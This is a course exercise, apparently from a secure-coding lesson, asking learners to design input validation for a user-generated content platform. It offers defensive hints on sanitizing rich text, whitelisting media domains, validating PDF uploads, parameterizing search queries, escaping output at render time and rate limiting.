Level 3 - Design a Secure System

Design an input validation architecture for a user-generated content platform where:

  • Users can submit articles with rich-text formatting (bold, italic, links, images)
  • Articles can embed external images and YouTube videos
  • Users can upload PDF attachments (max 10MB)
  • Articles are searchable via full-text search
  • The platform serves 50,000 articles and 1M page views per day

Document your validation strategy for: rich-text content, embedded media, file uploads, search queries, and how you handle second-order injection (malicious content retrieved from the database and rendered).

Design Hints
  1. Rich text: Accept content in Markdown (not raw HTML). Parse Markdown server-side with a strict parser that strips unknown elements. If HTML is needed, use bleach with a minimal whitelist of tags and attributes.
  2. Embedded media: Whitelist allowed domains for images (imgur.com, engineersofai.com) and videos (youtube.com, vimeo.com). Validate URLs via SSRF checks. Proxy external images through your CDN to prevent tracking pixels.
  3. File uploads: Validate PDFs by checking magic bytes (%PDF). Use a separate storage bucket with no execute permissions. Scan with ClamAV for malware. Generate a random filename.
  4. Search: Parameterize all search queries. Limit query length to 200 characters. Use PostgreSQL's to_tsquery with parameterized input, never string concatenation.
  5. Second-order injection: Escape output at render time, not just at input time. Use template engines with auto-escaping (Jinja2 with autoescape=True). Store raw content in the database, escape when rendering.
  6. Rate limiting: Limit article submissions to 10/hour per user. Limit search to 60/minute per IP.

What's Next

In the next lesson, SQL Injection Prevention, you will take a deep dive into SQL injection - understanding how UNION attacks, blind injection, and second-order injection work, and how to audit an entire SQLAlchemy codebase for vulnerabilities.

© 2026 EngineersOfAI. All rights reserved.